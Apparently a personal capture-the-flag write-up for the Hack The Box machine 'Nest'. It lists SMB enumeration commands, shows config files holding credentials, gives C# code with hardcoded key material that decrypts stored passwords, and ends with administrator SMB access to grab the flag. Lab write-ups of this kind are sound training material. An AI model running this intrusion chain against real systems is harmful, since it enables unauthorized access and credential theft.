Nest
- Commands can be run by adding -C flag (automatically sends CRLF) in nc nc -Cv nest.htb 4386 telnet nest.htb 4386 - SMB Share with some sort of misconfiguration smbclient -U '' -L nest.htb get "<filename-with-spaces>" - Listing directories and files recursively smbmap -H 10.10.10.178 -u '' -R smbmap -H 10.10.10.178 -u '[redacted]' -p '[redacted]' -R - Downloading files ending with .xml smbmap -H 10.10.10.178 -u '[redacted]' -p '[redacted]' -R -A '.xml' cat 10.10.10.178-Data_IT_Configs_RU\ Scanner_RU_config.xml <?xml version="1.0"?> <ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <Port>389</Port> <Username>[redacted]</Username> <Password>[redacted]</Password> </ConfigFile> - Password is encrypted string [Didn't work] smbclient -U "[redacted]%$(echo '[redacted]' | base64 -d)" nest.htb -L - SMB root folder not accessible but child folder 'Carl' is
cat 10.10.10.178-Data_IT_Configs_NotepadPlusPlus_config.xml <History nbMaxFile="15" inSubMenu="no" customLength="-1"> <File filename="C:\windows\System32\drivers\etc\hosts" /> <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" /> <File filename="C:\Users\C.Smith\Desktop\todo.txt" /> </History> - Decrypting user password - Convert the file 'Utils.vb' to a C-sharp file. https://converter.telerik.com/ Note: tried : 'wine64 cscript Utils.vb' to compile but there were errors [to-do?] - Add 'public static void main' to the 'Utils' class and create an object to call the 'Decrypt function'. Remove 'static' from 'Decrypt' function.
using System;
using System.Text;
using System.Security.Cryptography;
public class Utils
{
public static string GetLogFilePath()
{
return System.IO.Path.Combine(Environment.CurrentDirectory, "Log.txt");
}
public string DecryptString(string EncryptedString)
{
if (string.IsNullOrEmpty(EncryptedString))
return string.Empty;
else
return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256);
}
public static string EncryptString(string PlainString)
{
if (string.IsNullOrEmpty(PlainString))
return string.Empty;
else
return Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256);
}
public static string Encrypt(string plainText, string passPhrase, string saltValue, int passwordIterations, string initVector, int keySize)
{
byte[] initVectorBytes = Encoding.ASCII.GetBytes(initVector);
byte[] saltValueBytes = Encoding.ASCII.GetBytes(saltValue);
byte[] plainTextBytes = Encoding.ASCII.GetBytes(plainText);
Rfc2898DeriveBytes password = new Rfc2898DeriveBytes(passPhrase, saltValueBytes, passwordIterations);
byte[] keyBytes = password.GetBytes(System.Convert.ToInt32(keySize / (double)8));
AesCryptoServiceProvider symmetricKey = new AesCryptoServiceProvider();
symmetricKey.Mode = CipherMode.CBC;
ICryptoTransform encryptor = symmetricKey.CreateEncryptor(keyBytes, initVectorBytes);
using (System.IO.MemoryStream memoryStream = new System.IO.MemoryStream())
{
using (CryptoStream cryptoStream = new CryptoStream(memoryStream, encryptor, CryptoStreamMode.Write))
{
cryptoStream.Write(plainTextBytes, 0, plainTextBytes.Length);
cryptoStream.FlushFinalBlock();
byte[] cipherTextBytes = memoryStream.ToArray();
memoryStream.Close();
cryptoStream.Close();
return Convert.ToBase64String(cipherTextBytes);
}
}
}
public static string Decrypt(string cipherText, string passPhrase, string saltValue, int passwordIterations, string initVector, int keySize)
{
byte[] initVectorBytes;
initVectorBytes = Encoding.ASCII.GetBytes(initVector);
byte[] saltValueBytes;
saltValueBytes = Encoding.ASCII.GetBytes(saltValue);
byte[] cipherTextBytes;
cipherTextBytes = Convert.FromBase64String(cipherText);
Rfc2898DeriveBytes password = new Rfc2898DeriveBytes(passPhrase, saltValueBytes, passwordIterations);
byte[] keyBytes;
keyBytes = password.GetBytes(System.Convert.ToInt32(keySize / (double)8));
AesCryptoServiceProvider symmetricKey = new AesCryptoServiceProvider();
symmetricKey.Mode = CipherMode.CBC;
ICryptoTransform decryptor;
decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes);
System.IO.MemoryStream memoryStream;
memoryStream = new System.IO.MemoryStream(cipherTextBytes);
CryptoStream cryptoStream;
cryptoStream = new CryptoStream(memoryStream, decryptor, CryptoStreamMode.Read);
byte[] plainTextBytes;
plainTextBytes = new byte[cipherTextBytes.Length + 1];
int decryptedByteCount;
decryptedByteCount = cryptoStream.Read(plainTextBytes, 0, plainTextBytes.Length);
memoryStream.Close();
cryptoStream.Close();
string plainText;
plainText = Encoding.ASCII.GetString(plainTextBytes, 0, decryptedByteCount);
return plainText;
}
public static void Main(string[] args)
{
Console.WriteLine ("Hello Mono World");
Utils dec = new Utils();
string temp=dec.DecryptString("[redacted]");
Console.WriteLine(temp);
}
}- mcs Utils.cs - mono Utils.exe - smbclient -U '[redacted]%[redacted]' //10.10.10.178/Users - Fetching Debug password https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/ - smbclient -U '[redacted]%[redacted]' //10.10.10.178/Users - allinfo "Debug Mode Password.txt" - get "Debug Mode Password.txt:Password" Debug mode password - [redacted] - LDAP Data - setdir ..\ldap - showquery 2 [Ldap.conf] Domain=nest.local Port=389 BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local User=Administrator Password=[redacted] - Decompiling HQLdap.exe - ilspy - Open HQLdap.exe
- Save code for class "CR" - Add the following code inside the class "CR":
public static void Main(String [] args){
Console.WriteLine("Program Running");
CR dec = new CR();
String temp = CR.DS("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=");
Console.WriteLine(temp);
}- mcs CR.cs - mono CR.exe - Accessing Administrator directory - smbclient -U 'administrator%[redacted]' //10.10.10.178/C$ - cd Users/Administrator/Desktop/ - get flag.txt -
Last updated
Was this helpful?
